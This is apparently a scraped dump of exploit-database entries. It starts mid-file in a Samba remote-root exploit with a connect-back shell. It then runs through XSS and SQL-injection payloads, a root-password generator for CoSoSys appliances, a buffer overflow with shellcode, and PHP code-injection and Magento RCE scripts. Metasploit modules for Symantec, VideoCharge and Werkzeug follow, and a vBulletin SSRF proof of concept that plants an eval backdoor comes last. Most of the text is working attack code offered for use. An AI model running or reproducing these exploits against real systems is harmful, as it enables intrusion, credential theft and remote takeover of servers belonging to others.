def handle(self):
global do_brute
print "\n[!] connectback shell from %s" % self.client_address[0]
do_brute = False
s = self.request
import termios, tty, select, os
old_settings = termios.tcgetattr(0)
try:
tty.setcbreak(0)
c = True
while c:
for i in select.select([0, s.fileno()], [], [], 0)[0]:
c = os.read(i, 1024)
if c:
if i == 0:
os.write(1, c)
os.write(s.fileno() if i == 0 else 1, c)
except KeyboardInterrupt: pass
finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
return
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if len(sys.argv) != 6:
print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
print " targets:"
i = 0
for target in targets:
print " %02d) %s" % (i, target['name'])
i = i+1
print ""
sys.exit(-1)
target = targets[int(sys.argv[5])]
server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while do_brute == True:
sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
sys.stdout.flush()
exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
if "finder" in target:
target['chunk_offset'] += 4
else:
target['system_libc_offset'] += 0x1000
if "finder" in target:
print \
"{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
"system_libc_offset = 0x%03x" % \
(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)
while 1:
time.sleep(999)
server.shutdown()
source: https://www.securityfocus.com/bid/55561/info
IFOBS is prone to multiple HTML-injection vulnerabilities.
Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
IFOBS XSS-1.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-2.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-3.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-4.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-5.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html>
source: https://www.securityfocus.com/bid/55570/info
CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.
Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.
CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected.
function Get-EPPPassword {
<#
.Synopsis
Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.Description
Get-EPPPassword Timeline:
discovered 3 Mar 2012
reported to vendor 12 Jun 2012
reported to US-CERT 15 Jul 2012
released 17 Sep 2012
.Example
Get-EPPPassword -Serial 123456789
.Link
http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>
Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)
#function to calculate sums from serial number
function GetSerialSum {
if ($Serial.Length -ne 9) {
Return "EPP Serial Number is 9 digits"
}
else {
#convert $serial to an array of integers
[int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
}
foreach ($Number in $SerialArray) {
$Sum += $Number
}
Write-Output $Sum
}
#function to calculate epproot password
function GetPassword {
Write-Output "eroot!00$Sums`RO"
}
$Sums = GetSerialSum
GetPassword
}
Get-EPPPassword -Serial 135792468
source: https://www.securityfocus.com/bid/55589/info
AxisInternet VoIP Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
AxisInternet VoIP Manager 2.1.5.7 is vulnerable; other versions may also be affected.
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3 %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select
https://www.example.com/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
https://www.example.com/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
source: https://www.securityfocus.com/bid/55592/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.12 is vulnerable; other versions may also be affected.
http://www.example.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
source: https://www.securityfocus.com/bid/55586/info
TAGWORX.CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/gallery.php?cid=124'&pid=124
http://www.example.com/gallery.php?cat_id=17&cid='&pid=&img=1
http://www.example.com/gallery.php?cid=124'&pid=124
#!/usr/bin/python
# Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow
# Version: 5.6
# Date: 2015-08-17
# Author: Tracy Turben (tracyturben@gmail.com)
# Software Link: http://www.efssoft.com/
# Tested on: Win7x32-EN
# Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;)
# Credits for vulnerability discovery:
# superkojiman (http://www.exploit-db.com/exploits/33453/)
from struct import pack
import socket,sys
import os
host="192.168.1.15"
port=80
junk0 = "\x90" * 80
# 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll]
# The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job!
# Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8
call_edx=pack('<L',0x1001D8C8)
junk1="\x90" * 280
ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll]
# Since 0x00 would break the exploit needs to be crafted on the stack
crafted_jmp_esp=pack('<L',0xA44162FB)
test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction
kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll]
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0xDEADBEEF) # filler
kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP
kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll]
nopsled="\x90" * 20
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode
buf="GET /vfolder.ghp HTTP/1.1\r\n"
buf+="User-Agent: Mozilla/4.0\r\n"
buf+="Host:" + host + ":" + str(port) + "\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf+="Accept-Language: en-us\r\n"
buf+="Accept-Encoding: gzip, deflate\r\n"
buf+="Referer: http://" + host + "/\r\n"
buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n"
buf+="Conection: Keep-Alive\r\n\r\n"
print "[*] Connecting to Host " + host + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((host, port))
print "[*] Connected to " + host + "!"
except:
print "[!] " + host + " didn't respond\n"
sys.exit(0)
print "[*] Sending malformed request..."
s.send(buf)
print "[!] Exploit has been sent!\n"
s.close()
<?php
# Nuts-CMS Remote PHP Code Injection / Execution 0day Exploit
#
# Nuts CMS is a content management system (CMS), which enables you to build Web sites and powerful online applications.
# Nuts CMS is an open source solution that is freely available to everyone.
#
# Discovered by Yakir Wizman
# Date 17/08/2015
# Vendor Homepage : http://www.nuts-cms.com/
# CVE : N/A
# Description : Nuts CMS is vulnerable to php code injection due to improper input validation (CWE-20, https://cwe.mitre.org/data/definitions/20.html).
###
# Exploit code:
error_reporting(E_ALL);
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <path>");
echo("\nExample: php {$argv[0]} localhost /");
die();
}
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$path = $argv[2];
}
$pack = "GET {$path}nuts/login.php?r=<?php+error_reporting(0);print(_nutCmsId_);system(base64_decode(\$_SERVER[HTTP_CMD]));die;+?> HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Cmd: %s\r\n";
$pack.= "Connection: close\r\n\r\n";
while(1) {
print "\nAnonymous@{$host}:~# ";
if(($cmd = trim(fgets(STDIN))) == "exit")
break;
preg_match("/_nutCmsId_(.*)/s", http_send($host, sprintf($pack, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
function http_send($host, $pack) {
if(!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}\n");
fwrite($sock, $pack);
return stream_get_contents($sock);
}
?>
#!/usr/bin/python
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
# Google Dork: "Powered by Magento"
# Date: 08/18/2015
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
# Vendor Homepage: http://magento.com/
# Software Link: https://www.magentocommerce.com/download
# Version: 1.9.0.1 and below
# Tested on: Ubuntu 15
# CVE : none
from hashlib import md5
import sys
import re
import base64
import mechanize
def usage():
print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
sys.exit()
if len(sys.argv) != 3:
usage()
# Command-line args
target = sys.argv[1]
arg = sys.argv[2]
# Config.
username = ''
password = ''
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try:
request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
print e.read()
********************************************************************************************
# Exploit Title: FTP Commander 'Costum Command' SEH Over-Write(Buffer Overflow).
# Date: 8/17/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/ftpcomm.htm
# Version: 8.02
# Tested on: Windows 7 x32(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'ftpcomm.exe'.
2- Goto FTP - Server > Costum Command.
3- Below the SERVER LIST a input-box will appear, enter the contents of the crash.txt into it, then press Do it!.
4- Software will crash saying 'Access Violation at address XXXXXXXX......'.
This is basic SEH Over-write, i have tried to make a working exploit on WIN 7 x32 but no luck since this-
program does not have its own DLLs and using Windows DLLs is not a good idea b/c SAFESEH, have tried
other techniques but the final exploit seems to be un-stable.
[Code to produce crash.txt]:
junk = "A"*6000
file = open("crash.txt",'w')
file.write(junk)
file.close()
The following details are for those who would like to develop a working exploit for this software:
OFFSET: 4112 + BBBB[NSEH] + CCCC[SEH] ...
Hint: ~You can try loading the address from outside the address range of loaded modules.~ ;)
*****************************************************************************************************************************
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'VideoCharge Studio Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
processing a specially crafted .VSC file. This vulnerability could be
exploited by a remote attacker to execute arbitrary code on the target
machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Original discovery
'Andrew Smith', # MSF module
'Christian Mehlmauer' # MSF module
],
'References' =>
[
[ 'OSVDB', '69616' ],
[ 'EBD', '29234' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
'DisableNops' => true,
'Space' => 2808
},
'Targets' =>
[
[ 'VideoCharge Studio 2.12.3.685',
{
'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
'Offset' => 2184
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 27 2013',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
end
def exploit
buffer = rand_text_alpha(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Formats">
<Property name="Stream">
<Value name="Name" type="8" value="#{buffer}"/>
</Property>
</cols>
</Property>
</cols>
</config>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(file)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
include an authentication bypass, a directory traversal and a privilege escalation to
get privileged code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange', #discovery
'bperry' # metasploit module
],
'References' =>
[
['CVE', '2015-1486'],
['CVE', '2015-1487'],
['CVE', '2015-1489'],
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
],
'DefaultOptions' => {
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86,
'Payload' => {
'DisableNops' => true
}
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
], self.class)
end
def exploit
meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10)
print_status("#{peer} - Getting cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_post' => {
'ActionType' => 'ResetPassword',
'UserID' => 'admin',
'Domain' => ''
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end
cookie = res.get_cookies
if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}
print_status("#{peer} - Uploading payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
'KnownHosts' => '.'
},
'data' => payload.encoded_exe,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST',
'vars_get' => {
'ActionType' => 'BinaryFile',
'Action' => 'UploadPackage',
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
'KnownHosts' => '.'
},
'data' => exec,
'cookie' => cookie,
'ctype' => ''
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
}, 5)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Werkzeug Debug Shell Command Execution',
'Description' => %q{
This module will exploit the Werkzeug debug console to put down a
Python shell. This debugger "must never be used on production
machines" but sometimes slips passed testing.
Tested against:
0.9.6 on Debian
0.9.6 on Centos
0.10 on Debian
},
'Author' => 'h00die <mike[at]shorebreaksecurity.com>',
'References' =>
[
['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Targets' => [[ 'werkzeug 0.10 and older', {}]],
'Arch' => ARCH_PYTHON,
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
], self.class
)
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
)
# https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
if res && res.body =~ /Werkzeug powered traceback interpreter/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
# first we need to get the SECRET code
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
)
if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
secret = $1
vprint_status("Secret Code: #{secret}")
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI']),
'vars_get' => {
'__debugger__' => 'yes',
'cmd' => payload.encoded,
'frm' => '0',
's' => secret
}
)
else
print_error('Secret code not detected.')
end
end
end
vBulletin's memcache setting is vulnerable in certain versions(all
before 4.2.2) to an RCE. vBulletin seem to have refused to classify it
as a vulnerability or post anything about it, or put anything in the
announcements on their website. They say "PL2 (4.2.2) should prevent the
use of localhost," however that doesn't help people using previous
versions(which they appear to support with patches, still.)
They also haven't updated previous versions of vBulletin for this bug,
despite it being reported that it works on versions prior to 4.2.2.
Of course though, the most important thing is, they haven't announced
there even is/was a vulnerability in any version.
Anyways, here it is:
Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4
The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function to as a proxy commit TCP port scans on other hosts. Much worse, it also allows to connect to local loopback-only services or to services only exposed on an internal network.
On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value.
Proof-of-Concept using cURL:
—
$ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png'
—
This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data:
—
HEAD /
set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}
";}
quit
.png HTTP/1.0
Host: localhost
User-Agent: vBulletin via PHP
Connection: close
—
This will cause the Memcached to update the `pluginlist` to contain the malicious code.
Furthermore, the remote upload happily follows all kinds of redirects if provided with an appropriate Location header.